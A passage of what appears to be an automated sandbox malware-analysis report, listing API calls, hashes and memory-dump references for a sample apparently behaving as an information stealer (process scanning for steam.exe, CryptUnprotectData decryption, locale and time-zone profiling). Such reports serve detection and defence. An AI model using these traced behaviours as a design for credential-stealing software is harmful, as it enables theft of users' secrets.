                        • CloseHandle.KERNEL32(00000000), ref: 00514731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 71ed22dd732198f2a3ba06e20a061d73a2c3800ff786ba2c00695eb6e1e897e2
                        • Instruction ID: bae338087c9c5a91aa7e3816b4e0c93fc1fc5b416d76595c4f24c4e63d2f3d32
                        • Opcode Fuzzy Hash: 71ed22dd732198f2a3ba06e20a061d73a2c3800ff786ba2c00695eb6e1e897e2
                        • Instruction Fuzzy Hash: 1101AD31601129ABE7315B609C88FFA3B7CEB49B11F084088FA0591080EF7899828E69
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00514628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00514638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0051464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00514660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00514672
                        • CloseHandle.KERNEL32(00000000), ref: 0051467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: 058899c409529be29198780055f859a49c92c060cc64d87499b5ac377261927d
                        • Instruction ID: 2f3f35ee42b10d6c2a93d298d5557548342be5eb8dcac35f42c3d3a9bef9c44f
                        • Opcode Fuzzy Hash: 058899c409529be29198780055f859a49c92c060cc64d87499b5ac377261927d
                        • Instruction Fuzzy Hash: C90162716011299BE730AB60AC49FEA7BBCEF09755F0441D5EA08D1040EF78D9958FE9
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504B7F
                        • lstrlen.KERNEL32(00524CA8), ref: 00504B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BA7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 00504BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00504BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: c6b3130b8aaa9536ca8ecf055a35c38fae150a3511853403d93511b7eae9c3b5
                        • Instruction ID: 9a1d8cd398b14f1d6f5ea3cf6b671f6c10ba0540fb2d4d0f838e0da8471f5dd6
                        • Opcode Fuzzy Hash: c6b3130b8aaa9536ca8ecf055a35c38fae150a3511853403d93511b7eae9c3b5
                        • Instruction Fuzzy Hash: 3231557162111D9BCB31EF26ED85EAE7BB9FF40704F045129FA0597191CBB8DC118B94
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00512D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00512DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00512DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00512DEC
                        • LocalFree.KERNEL32(00000000), ref: 00512FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 9cb50eb2719b0ae669f48f6c3670842132b3c93938bf1d18881de0719201b534
                        • Instruction ID: a875378603010f4996ef2867e02ee6fc0a317a4373193bd00afad8ff06fbb78d
                        • Opcode Fuzzy Hash: 9cb50eb2719b0ae669f48f6c3670842132b3c93938bf1d18881de0719201b534
                        • Instruction Fuzzy Hash: 08B10C71900209CFE725CF19C949BA5BBF5FB44324F29C1A9E4089B2A2D7769DD2CF80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: E}~$.B+$5)}_$;W}$MHyo$Zk^$qJnu
                        • API String ID: 0-682286826
                        • Opcode ID: 906fd6ceab7c7098d241017961a944ba4a82738ef5be3634f973269261c81bf2
                        • Instruction ID: 7bd621e2958ba49e475ef58d6695690b2d426321cba211a8537260f8136bf285
                        • Opcode Fuzzy Hash: 906fd6ceab7c7098d241017961a944ba4a82738ef5be3634f973269261c81bf2
                        • Instruction Fuzzy Hash: 6AB2E3F360C2009FE704AE29EC8567AFBE5EF98320F16492DE6C5C7744EA3598418797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *l~?$1u_o$6#<v$`}{{${V]$O{
                        • API String ID: 0-1236110375
                        • Opcode ID: 68d5de081ecc6438447934184180fc35c9cf396e21060a0f6d02f935478cf6aa
                        • Instruction ID: 2a1415e9a1e0b93c70c3c79e94c2e3f51b6ce7f86bfb3945f26d6fcb3ae4d040
                        • Opcode Fuzzy Hash: 68d5de081ecc6438447934184180fc35c9cf396e21060a0f6d02f935478cf6aa
                        • Instruction Fuzzy Hash: BFB2E6F360C6009FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7344E63598418697
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00512C58
                        • wsprintfA.USER32 ref: 00512C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 2eab1596dbd891a754048bfa5aa6402f68fd5acc6a0d4998ae9be67d6fb93e5f
                        • Instruction ID: 509772399cea42f6e4e790dfa99ddd605b1adfc921714d00bb6de7d835236299
                        • Opcode Fuzzy Hash: 2eab1596dbd891a754048bfa5aa6402f68fd5acc6a0d4998ae9be67d6fb93e5f
                        • Instruction Fuzzy Hash: F0012B71A00604ABD7288F58DC49FADBB6DFB85721F048729FA15D77C0D774190087D5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Qjuk$W}m}$cs+$p?e$5|}
                        • API String ID: 0-1456871573
                        • Opcode ID: d2656a530b16c2aa199d357ca8f633fdf79e44902814746502a6e8d7ace3917d
                        • Instruction ID: 127ee64a64ec074877f3453a4dbfdda3abdf75467d4ca3c0f85675edeaea336b
                        • Opcode Fuzzy Hash: d2656a530b16c2aa199d357ca8f633fdf79e44902814746502a6e8d7ace3917d
                        • Instruction Fuzzy Hash: 47B217F3A0C2049FE3086E2DEC8577ABBE5EB94320F1A863DE6C5C3744E97558058697
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004F77AD
                        • LocalFree.KERNEL32(?), ref: 004F77B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: e25c89f02b8ed38b24a87e57105d127b9b769725931567dc88a2b3c26ca95e85
                        • Instruction ID: e0020180fa7968fbd2624821deb6661311ef7143e36889f2e37653309d22cf9c
                        • Opcode Fuzzy Hash: e25c89f02b8ed38b24a87e57105d127b9b769725931567dc88a2b3c26ca95e85
                        • Instruction Fuzzy Hash: C3012575B403097BEB20DB94DC4AFAA7B78FB44B15F108155FB09EB2C0D6B5A901C794
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: J];$QP}$a5_{$ausl
                        • API String ID: 0-2407705382
                        • Opcode ID: 69383e9c490cd361c59443202a7f50c782c649a49d340e802afdc3ab648999a1
                        • Instruction ID: 450e03bae0f02119912848106f7f1e46e642868e3e4e5d2ebdc89d6111eb42c6
                        • Opcode Fuzzy Hash: 69383e9c490cd361c59443202a7f50c782c649a49d340e802afdc3ab648999a1
                        • Instruction Fuzzy Hash: 4FB218F3A082049FE304AE2DEC8567AFBE9EBD4720F1A853DE6C5C3744E93558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • String ID: (:C!$9h_$g\y${/
                        • API String ID: 0-4222029071
                        • Opcode ID: e257a401b66ec379659a280a0e471bd062096ffbef2747a328f22c349e6ded7c
                        • Instruction ID: b21b681ba10805ab4fdef5d72ae48cd27db3490c3d532ecd0e310a0fb7125fc1
                        • Opcode Fuzzy Hash: e257a401b66ec379659a280a0e471bd062096ffbef2747a328f22c349e6ded7c
                        • Instruction Fuzzy Hash: 9DB217F3A0C2049FE3046E2DEC8567AB7E9EF94720F1A493DEAC5C3744EA3558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • String ID: 'Q;$<:|k$.q$^]~
                        • API String ID: 0-1018311729
                        • Opcode ID: cce037effa87dc7cc6c60830d3e8afc93c2991678cb2faeb58cd1bb0cd1f4780
                        • Instruction ID: 63a234f7e1ab2eb8b1252f28ccc607d4923323c9cf5fc3a45dbb1e496c029d41
                        • Opcode Fuzzy Hash: cce037effa87dc7cc6c60830d3e8afc93c2991678cb2faeb58cd1bb0cd1f4780
                        • Instruction Fuzzy Hash: 4CB205F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C3744EA3558058796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • String ID: a-oo$i=|w$o\x~$F<
                        • API String ID: 0-2181640793
                        • Opcode ID: eee807601f0da4e87eee7972f2c1bbcb2a992f787390ebb20f9d0e0dc23c84f1
                        • Instruction ID: fefeeeb0d132cb250b1819b2620ce0d92e3f4e1df37e7676e95aec950c90c9dd
                        • Opcode Fuzzy Hash: eee807601f0da4e87eee7972f2c1bbcb2a992f787390ebb20f9d0e0dc23c84f1
                        • Instruction Fuzzy Hash: 31B2E4F360C6009FE304AE2DEC8567ABBE9EF94720F1A493DEAC4C3744E63558458796
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00513A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00513AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00513ABF
                          • Part of subcall function 00517310: lstrlen.KERNEL32(------,004F5BEB), ref: 0051731B
                          • Part of subcall function 00517310: lstrcpy.KERNEL32(00000000), ref: 0051733F
                          • Part of subcall function 00517310: lstrcat.KERNEL32(?,------), ref: 00517349
                          • Part of subcall function 00517280: lstrcpy.KERNEL32(00000000), ref: 005172AE
                        • CloseHandle.KERNEL32(00000000), ref: 00513BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • API String ID: 1066202413-0
                        • Opcode ID: 87440e07ab8788aeb1d50fd106ccd176c59045ca42fe469f91355dd3e74416c2
                        • Instruction ID: c534a72b9ec12f339174c03662b7c556eae592fa1700cd5dec83f395ed34d4a5
                        • Opcode Fuzzy Hash: 87440e07ab8788aeb1d50fd106ccd176c59045ca42fe469f91355dd3e74416c2
                        • Instruction Fuzzy Hash: 78810630904209CFE724CF19D958B95BBF1FF44329F29C1A9D4089B2A2D77A9DC6CB80
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004FEA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 004FEA7E
                        • lstrcat.KERNEL32(0051CFEC,0051CFEC), ref: 004FEB27
                        • lstrcat.KERNEL32(0051CFEC,0051CFEC), ref: 004FEB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • API String ID: 189259977-0
                        • Opcode ID: e2faa7f7b229cf349d7494aa15fb200017166dd0beecc09beb1168b63b10d799
                        • Instruction ID: 9d589642341a669d6766dce901c6f4d0d9722ae38886afc56a7231332e4c1eb9
                        • Opcode Fuzzy Hash: e2faa7f7b229cf349d7494aa15fb200017166dd0beecc09beb1168b63b10d799
                        • Instruction Fuzzy Hash: B9312735A40119ABE720CB58EC45FEF7B7DAF44701F048069FA09E3240DBB55A458BA6
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005140CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005140DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005140E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00514113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • API String ID: 3825993179-0
                        • Opcode ID: 22fe2edf2a79afeb072f08dbc1204e143c7384007dfb24d06cded9c1da97a6bc
                        • Instruction ID: 5f996109202df774e47a18e4f92e0811b1f050647ef67ffda0ce18419b90d305
                        • Opcode Fuzzy Hash: 22fe2edf2a79afeb072f08dbc1204e143c7384007dfb24d06cded9c1da97a6bc
                        • Instruction Fuzzy Hash: 1E012174601209BBEB20DFA5DC89BAABBADEF49311F108159FE09C7340DA71D981CB55
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0051A3D0,000000FF), ref: 00512B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00512B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0051A3D0,000000FF), ref: 00512BA2
                        • wsprintfA.USER32 ref: 00512BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • API String ID: 377395780-0
                        • Opcode ID: 7977b484b2949a0bf0d0476d888d6810b1c21e3c2bd344279103100d4847888e
                        • Instruction ID: 5b9090bef8ced1156990a6e3d359d82f46d15527496e9a4f3cf47c1c5516f0f6
                        • Opcode Fuzzy Hash: 7977b484b2949a0bf0d0476d888d6810b1c21e3c2bd344279103100d4847888e
                        • Instruction Fuzzy Hash: F4014CB2904129ABCB249BC9DD45FBEB7BCFB4CB11F00421AFA05A2280E77D5840C7B5
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004F9B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004F9B61
                        • LocalFree.KERNEL32 ref: 004F9B70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • API String ID: 4291131564-0
                        • Opcode ID: aa31948660d26b7c8d0afd3e32bf2ea9f74471bb5faea2bf733f8ed8b134719c
                        • Instruction ID: 8664ab669344e6dae84a0768b0743054b896bd551c56415ca3f738b7f299b5d2
                        • Opcode Fuzzy Hash: aa31948660d26b7c8d0afd3e32bf2ea9f74471bb5faea2bf733f8ed8b134719c
                        • Instruction Fuzzy Hash: 98F0BD703443166BE7305F65AC49F677BA8EF04B51F240515FB45EA2D0D7B89C41CAA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • String ID: "Q~$@{__$JAwz$kaH_
                        • API String ID: 0-4150157240
                        • Opcode ID: fddbbe2c90393b68dbca09d89059f249e96003db9ca372f1e9039a3d8fad251e
                        • Instruction ID: 614b86dde9b1abdcccb85b6f32fc17d1b24bfa1802ec9689b183cc804504bf26
                        • Opcode Fuzzy Hash: fddbbe2c90393b68dbca09d89059f249e96003db9ca372f1e9039a3d8fad251e
                        • Instruction Fuzzy Hash: BB1206F3A086149FE304AE2DEC8567AB7E9EF94720F1A4A3DE6C4C3744E67558048793
                        APIs
                        • CoCreateInstance.COMBASE(0051B110,00000000,00000001,0051B100,?), ref: 0050CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0050CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0050CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        • API String ID: 1940255200-0
                        • Opcode ID: f952c258fa8ef3a4836302edb799d6324c4705717266cf07685a990853976589
                        • Instruction ID: df799c195a9e714d45743c64dc757cfaf2892165a807bdb07afc870546dab656
                        • Opcode Fuzzy Hash: f952c258fa8ef3a4836302edb799d6324c4705717266cf07685a990853976589
                        • Instruction Fuzzy Hash: B9314671A40615BFE710DB98CC92FAD7BB9AB89B10F104294FA14EB2D0D7B1AD45CB90
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F9BB3
                        • LocalFree.KERNEL32(?), ref: 004F9BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 4c5d7dff663bbb3d117f5b60948286d9974ffb48b06a8d992bd127e7dac9c5aa
                        • Instruction ID: 43febff59b1cbf72a61a8c20bf336b274760b0ce86fd56f6ad819dea5920f693
                        • Opcode Fuzzy Hash: 4c5d7dff663bbb3d117f5b60948286d9974ffb48b06a8d992bd127e7dac9c5aa
                        • Instruction Fuzzy Hash: 77011DB5E4120AABE710DBA4DC45FBBB778EB44B00F144555EB04AB380D7B5AE018BE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: bb(=
                        • API String ID: 0-4262272353
                        • Opcode ID: 059efcdacb8c1b114d7ad99e80eb6e6eb1eda29f658fa9f1ac9a6512be0a746c
                        • Instruction ID: 6e8c9b8acec69c2a3a0f9125ddd6b2990d320786215cb8c57f4b6bdaa6d8dbf6
                        • Opcode Fuzzy Hash: 059efcdacb8c1b114d7ad99e80eb6e6eb1eda29f658fa9f1ac9a6512be0a746c
                        • Instruction Fuzzy Hash: 49D1E7F390C304AFE3146E6CEC8567AFBE8EB64320F16493DEAC4C7744E635A9058656
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: B=a~
                        • API String ID: 0-4155588532
                        • Opcode ID: 6677d52114e728ff9c4e69207cdc8cac164cb0815a9280b35d47c79111673e55
                        • Instruction ID: 5135b1bff56eedb2dd8f964d1bc6589ec0835f83e8e7d50992e0919ec745fcd7
                        • Opcode Fuzzy Hash: 6677d52114e728ff9c4e69207cdc8cac164cb0815a9280b35d47c79111673e55
                        • Instruction Fuzzy Hash: 9471C5F3A086009FE345AE29DC4477AF7E5EFD4720F17893DD6C887680EA3948458B86
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
